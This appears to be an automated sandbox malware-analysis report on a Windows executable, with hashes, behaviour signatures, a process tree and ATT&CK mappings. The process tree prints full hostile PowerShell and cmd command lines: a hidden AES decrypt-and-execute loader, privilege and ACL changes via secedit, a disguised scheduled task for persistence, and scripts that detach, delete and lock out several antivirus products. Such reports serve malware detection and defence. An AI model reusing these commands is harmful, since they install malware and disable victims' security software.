Overview

overview

10

Static

static

1

71a989d9d8...db.exe

windows7-x64

10

71a989d9d8...db.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-11-2024 03:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    71a989d9d893661e66be5d259cad821f5dbc0a58933ea69cd0634b87d42e89db.exe

  • Size

    21.2MB

  • MD5

    f6ce1ee1de72a6286bc07263b1f3935a

  • SHA1

    514703f64abfa8ab53995cdacda6e90fc8b4650a

  • SHA256

    71a989d9d893661e66be5d259cad821f5dbc0a58933ea69cd0634b87d42e89db

  • SHA512

    e3906cd91a466f91a6717d9568603e0b733f29286d1fe73256bb0b105fa50dc54a33bb3e013521c9ec5ff43101ea40f912d000c16d93f4ba0587dcab18b0399b

  • SSDEEP

    393216:kecsJTzmKnYuOKzur7M+uQTwLCrws9PuRX08rYK4FcQod:ZNYyzC7PuwqCEsIRXlV4nod

Score
10/10
defense_evasiondiscoveryevasionexecutionpersistencetrojanupx

Malware Config

Signatures

  • UAC bypass 3 TTPs 3 IoCs
    evasiontrojan
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Using powershell.exe command.

    execution
  • Modifies RDP port number used by Windows 1 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 1 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
    persistence
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

    defense_evasion
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 13 IoCs
  • Hide Artifacts: Ignore Process Interrupts 1 TTPs 5 IoCs

    Command interpreters often include specific commands/flags that ignore errors and other hangups.

    defense_evasion
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 13 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 53 IoCs
  • System policy modification 1 TTPs 3 IoCs
    evasion

Processes

  • C:\Users\Admin\AppData\Local\Temp\71a989d9d893661e66be5d259cad821f5dbc0a58933ea69cd0634b87d42e89db.exe
    "C:\Users\Admin\AppData\Local\Temp\71a989d9d893661e66be5d259cad821f5dbc0a58933ea69cd0634b87d42e89db.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4860
    • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
      "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5904754 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\71a989d9d893661e66be5d259cad821f5dbc0a58933ea69cd0634b87d42e89db.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-4050598569-1597076380-177084960-1000"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Loads dropped DLL
      • Drops file in Program Files directory
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2136
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command function Copy-Stream { param( [IO.Stream]$FromStream, [IO.Stream]$ToStream ) $buff = New-Object 'byte[]' -ArgumentList 80kb while (($readCount = $FromStream.Read($buff, 0, $buff.Length)) -gt 0) { $ToStream.Write($buff, 0, $readCount) } } function Get-FixedBytes { param( [byte[]]$Bytes, [int]$Size ) if ($Bytes.Length -eq $Size) { return , $Bytes } if ($Bytes.Length -gt $Size) { return , $Bytes[0..($Size - 1)] } return , ($Bytes + (New-Object 'byte[]' ($Size - $Bytes.Length) )) } function Unprotect-AesData { [CmdletBinding()] param ( [Parameter(ParameterSetName = \"FromFileToFile\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [Parameter(ParameterSetName = \"FromFileToStream\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [string[]]$FromFile, [Parameter(ParameterSetName = \"FromLiteralFileToFile\", Mandatory = $true, ValueFromPipelineByPropertyName = $true)] [Parameter(ParameterSetName = \"FromLiteralFileToStream\", Mandatory = $true, ValueFromPipelineByPropertyName = $true)] [Alias(\"PSPath\")] [string[]]$FromLiteralFile, [Parameter(ParameterSetName = \"FromFileToFile\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromLiteralFileToFile\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromStreamToFile\", Mandatory = $true, Position = 1)] [string]$ToFile, [Parameter(ParameterSetName = \"FromFileToFile\", Mandatory = $false)] [Parameter(ParameterSetName = \"FromLiteralFileToFile\", Mandatory = $false)] [Parameter(ParameterSetName = \"FromStreamToFile\", Mandatory = $false)] [switch]$Append, [Parameter(ParameterSetName = \"FromStreamToFile\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [Parameter(ParameterSetName = \"FromStreamToStream\", Mandatory = $true, ValueFromPipeline = $true, ValueFromPipelineByPropertyName = $true, Position = 0)] [System.IO.Stream[]]$FromStream, [Parameter(ParameterSetName = \"FromFileToStream\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromLiteralFileToStream\", Mandatory = $true, Position = 1)] [Parameter(ParameterSetName = \"FromStreamToStream\", Mandatory = $true, Position = 1)] [System.IO.Stream]$ToStream, [ValidateSet(128, 192, 256)] [int]$KeySize = 256, [System.Security.Cryptography.CipherMode]$Mode = [System.Security.Cryptography.CipherMode]::CBC, [System.Security.Cryptography.PaddingMode]$Padding = [System.Security.Cryptography.PaddingMode]::PKCS7, [byte[]]$Key1, [byte[]]$IV1, [System.Security.SecureString]$Password, [byte[]]$PasswordBytes, [string]$PasswordPlain, [ValidateNotNullOrEmpty()] [ValidateCount(8, 2147483647)] [byte[]]$Salt = (200, 78, 178, 161, 117, 108, 182, 25, 83, 212, 170, 163, 245, 143, 72, 180, 117, 109, 100, 180, 172, 49, 207, 73, 78, 231, 183, 46, 143, 113, 43, 64), [int]$Iteration = 1000, [ValidateNotNullOrEmpty()] [string]$KeyHashAlg = 'SHA1' ) begin { $formatDebug = \"NamedBlock = {0,-10}, ParameterSetName = {1}\" $PSCmdlet.WriteDebug(($formatDebug -f \"begin\", $PSCmdlet.ParameterSetName)) # if (-not ($PSBoundParameters.ContainsKey('Password') -xor $PSBoundParameters.ContainsKey('PasswordBytes'))) { # throw \"Parameter 'Password' and 'PasswordBytes' must be bounded to only one, not both.\" # } try { [System.Security.Cryptography.SymmetricAlgorithm]$aes = [System.Security.Cryptography.Aes]::Create() $aes.KeySize = $KeySize $aes.Mode = $Mode $aes.Padding = $Padding if ($null -ne $Key1) { $aes.Key = Get-FixedBytes -Bytes $Key1 -Size ($aes.KeySize / 8) if ($null -ne $IV1) { $aes.IV = Get-FixedBytes -Bytes $IV1 -Size ($aes.BlockSize / 8) } } else { try { $keyGen = New-Object System.Security.Cryptography.Rfc2898DeriveBytes -ArgumentList ($(if ($PSBoundParameters.ContainsKey('Password')) { (New-Object pscredential -ArgumentList 'user', $Password -ErrorAction Stop).GetNetworkCredential().Password } elseif ($PSBoundParameters.ContainsKey('PasswordBytes')) { , $PasswordBytes }elseif ($PSBoundParameters.ContainsKey('PasswordPlain')) { $PasswordPlain }), $Salt, $Iteration, [System.Security.Cryptography.HashAlgorithmName]$KeyHashAlg) } catch { $keyGen = New-Object System.Security.Cryptography.Rfc2898DeriveBytes -ArgumentList ($(if ($PSBoundParameters.ContainsKey('Password')) { (New-Object pscredential -ArgumentList 'user', $Password -ErrorAction Stop).GetNetworkCredential().Password } elseif ($PSBoundParameters.ContainsKey('PasswordBytes')) { , $PasswordBytes }elseif ($PSBoundParameters.ContainsKey('PasswordPlain')) { $PasswordPlain }), $Salt, $Iteration) #for ps2.0 } $aes.Key = $keyGen.GetBytes($aes.KeySize / 8) $aes.IV = $keyGen.GetBytes($aes.BlockSize / 8) } $Key1 = $aes.Key $IV1 = $aes.IV if ($PSBoundParameters.ContainsKey(\"ToFile\")) { $filemode = if ($Append) { [System.IO.FileMode]::Append }else { [System.IO.FileMode]::Create } $ToStream = New-Object System.IO.FileStream -ArgumentList ($ToFile, $filemode, [System.IO.FileAccess]::Write, [System.IO.FileShare]::None) -ErrorAction Stop } } catch { if ($ToFile -and $ToStream) { $ToStream.Close() } throw } finally { if ($aes) { $aes.Clear() try { $aes.Dispose() }catch {} } if ($keyGen) { try { $keyGen.Dispose() }catch {} } } } process { $PSCmdlet.WriteDebug(($formatDebug -f \"process\", $PSCmdlet.ParameterSetName)) if (\"FromStreamToFile\", \"FromStreamToStream\" -contains $PSCmdlet.ParameterSetName) { foreach ($itemStream in $FromStream) { try { [System.Security.Cryptography.SymmetricAlgorithm]$aes = [System.Security.Cryptography.Aes]::Create() $aes.KeySize = $KeySize $aes.Mode = $Mode $aes.Padding = $Padding $aes.Key = $Key1 $aes.IV = $IV1 # $keyGen.Reset() $transform = $aes.CreateDecryptor() try { $cryptoStream = New-Object System.Security.Cryptography.CryptoStream -ArgumentList ($itemStream, $transform, [System.Security.Cryptography.CryptoStreamMode]::Read, $true) } catch { $cryptoStream = New-Object System.Security.Cryptography.CryptoStream -ArgumentList ($itemStream, $transform, [System.Security.Cryptography.CryptoStreamMode]::Read) } # $cryptoStream.CopyTo($ToStream) Copy-Stream -FromStream $cryptoStream -ToStream $ToStream } finally { if ($cryptoStream) { $cryptoStream.Clear() $cryptoStream.Close() Clear-Variable -Name cryptoStream } if ($transform) { try { $transform.Dispose() }catch {} Clear-Variable -Name transform } if ($aes) { $aes.Clear() try { $aes.Dispose() }catch {} Clear-Variable -Name aes } } trap {} } return } foreach ($apath in $(if (\"FromFileToFile\", \"FromFileToStream\" -contains $PSCmdlet.ParameterSetName) { Convert-Path -Path $FromFile } else { Convert-Path -LiteralPath $FromLiteralFile })) { try { $itemStream = New-Object System.IO.FileStream -ArgumentList ($apath, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::Read) [System.Security.Cryptography.SymmetricAlgorithm]$aes = [System.Security.Cryptography.Aes]::Create() $aes.KeySize = $KeySize $aes.Mode = $Mode $aes.Padding = $Padding $aes.Key = $Key1 $aes.IV = $IV1 # $keyGen.Reset() $transform = $aes.CreateDecryptor() $cryptoStream = New-Object System.Security.Cryptography.CryptoStream -ArgumentList ($itemStream, $transform, [System.Security.Cryptography.CryptoStreamMode]::Read) # $cryptoStream.CopyTo($ToStream) Copy-Stream -FromStream $cryptoStream -ToStream $ToStream } finally { if ($cryptoStream) { $cryptoStream.Clear() $cryptoStream.Close() Clear-Variable -Name cryptoStream } if ($itemStream) { $itemStream.Close() Clear-Variable -Name itemStream } if ($transform) { try { $transform.Dispose() }catch {} Clear-Variable -Name transform } if ($aes) { $aes.Clear() try { $aes.Dispose() }catch {} Clear-Variable -Name aes } } trap {} } } end { $PSCmdlet.WriteDebug(($formatDebug -f \"end\", $PSCmdlet.ParameterSetName)) if ($PSBoundParameters.ContainsKey(\"ToFile\")) { $ToStream.Close() } if ($keyGen) { try { $keyGen.Dispose() }catch {} } } } # main $FromLiteralFile = \"C:\ProgramData\Program\Uninstall_.exe\" $ToFile = \"C:\ProgramData\Program\iusb3mon.exe\" $PasswordPlain = \"123\" if ($FromLiteralFile -ne $ToFile) { Unprotect-AesData -FromLiteralFile $FromLiteralFile -ToFile $ToFile -PasswordPlain $PasswordPlain } else { #inplace $fi0 = Get-Item -LiteralPath $FromLiteralFile -ErrorAction SilentlyContinue if ($null -ne $fi0) { $tmpfile = [IO.Path]::GetTempFileName() Unprotect-AesData -FromLiteralFile $FromLiteralFile -ToFile $tmpfile -PasswordPlain $PasswordPlain if ($?) { Move-Item -LiteralPath $tmpfile -Destination $ToFile -Force } } } #ps1Ö´ÐÐexe Start-Process -FilePath $ToFile -ArgumentList '$false' -WorkingDirectory ([IO.Path]::GetDirectoryName($ToFile)) -WindowStyle Hidden
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3668
        • C:\ProgramData\Program\iusb3mon.exe
          "C:\ProgramData\Program\iusb3mon.exe" $false
          4⤵
          • UAC bypass
          • Executes dropped EXE
          • Adds Run key to start application
          • Checks whether UAC is enabled
          • System Location Discovery: System Language Discovery
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          • System policy modification
          PID:2736
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.*')) -Force;"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3996
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
              6⤵
              • System Location Discovery: System Language Discovery
              PID:4132
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Microsoft\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege2.*')) -Force;"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:5112
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege2.log /quiet
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1200
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.*')) -Force;"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1264
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1488
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUAPQAiACQAQwBIAEkAQwBBAEcATwAkACIADQAKAFIAZQB2AGkAcwBpAG8AbgA9ADEADQAKAFsAUAByAGkAdgBpAGwAZQBnAGUAIABSAGkAZwBoAHQAcwBdAA0ACgBTAGUARABlAGIAdQBnAFAAcgBpAHYAaQBsAGUAZwBlACAAPQAgACoAUwAtADEALQA1AC0AMQA4AA0ACgA=')); secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.*')) -Force;"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4804
            • C:\Windows\SysWOW64\SecEdit.exe
              "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\Admin\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1480
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo.>c:\inst.ini
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3176
          • C:\Windows\SysWOW64\cmd.exe
            cmd /c echo.>c:\inst.ini
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4848
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder(ϵͳÒôƵ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3984
            • C:\Windows\SysWOW64\schtasks.exe
              schtasks.exe /create /tn "Windows Audio Endpoint Builder(ϵͳÒôƵ·þÎñ)" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml
              6⤵
              • System Location Discovery: System Language Discovery
              • Scheduled Task/Job: Scheduled Task
              PID:3176
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360°²È«ÎÀÊ¿*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Hide Artifacts: Ignore Process Interrupts
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1428
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$360safe = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -like '*360sd*' } | ForEach-Object { $_.InstallLocation };if ($360safe){$360drive = [IO.Path]::GetPathRoot($360safe).TrimEnd('\');fltmc.exe detach 360Box64 $360drive;fltmc.exe detach 360FsFlt $360drive;fltmc.exe detach 360qpesv $360drive;fltmc.exe detach DsArk $360drive;Remove-Item -Path $360safe -Recurse -Force;(Get-ChildItem -Path $360safe -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $360safe /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Hide Artifacts: Ignore Process Interrupts
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1816
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match 'ÌÚѶµçÄԹܼÒ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach TFsFlt $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Hide Artifacts: Ignore Process Interrupts
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1616
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '»ðÈÞ' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString)} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach sysdiag $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Hide Artifacts: Ignore Process Interrupts
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3352
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference='SilentlyContinue';$huorong_path = Get-ChildItem -Path @('HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall', 'HKCU:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall') -ErrorAction SilentlyContinue | Get-ItemProperty -Name DisplayName, DisplayVersion, InstallLocation, UninstallString -ErrorAction SilentlyContinue | Where-Object { $_.DisplayName -match '½ðɽ¶¾°Ô' } | ForEach-Object { [IO.Path]::GetDirectoryName($_.UninstallString.Replace([string][char]34,''))} };if ($huorong_path){$huorong_drive = [IO.Path]::GetPathRoot($huorong_path).TrimEnd('\');fltmc.exe detach kisknl $huorong_drive;Remove-Item -Path $huorong_path -Recurse -Force;(Get-ChildItem -Path $huorong_path -Recurse|Where-Object{$_ -is [IO.FileInfo]})|Rename-Item -NewName {'001_'+$_.Name} -Force;icacls.exe $huorong_path /deny 'Everyone:(OI)(CI)RX';Set-Content -Value 'ok' -Path 'C:\ok.ini';}
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Hide Artifacts: Ignore Process Interrupts
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1004
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:1920

    Network

    MITRE ATT&CK Enterprise v15

    Reconnaissance

    Resource Development

    Initial Access

    Execution

    Command and Scripting Interpreter

    1
    T1059

    PowerShell

    1
    T1059.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Persistence

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Privilege Escalation

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Boot or Logon Autostart Execution

    1
    T1547

    Registry Run Keys / Startup Folder

    1
    T1547.001

    Scheduled Task/Job

    1
    T1053

    Scheduled Task

    1
    T1053.005

    Defense Evasion

    Abuse Elevation Control Mechanism

    1
    T1548

    Bypass User Account Control

    1
    T1548.002

    Hide Artifacts

    1
    T1564

    Ignore Process Interrupts

    1
    T1564.011

    Impair Defenses

    1
    T1562

    Disable or Modify Tools

    1
    T1562.001

    Indicator Removal

    1
    T1070

    File Deletion

    1
    T1070.004

    Modify Registry

    3
    T1112

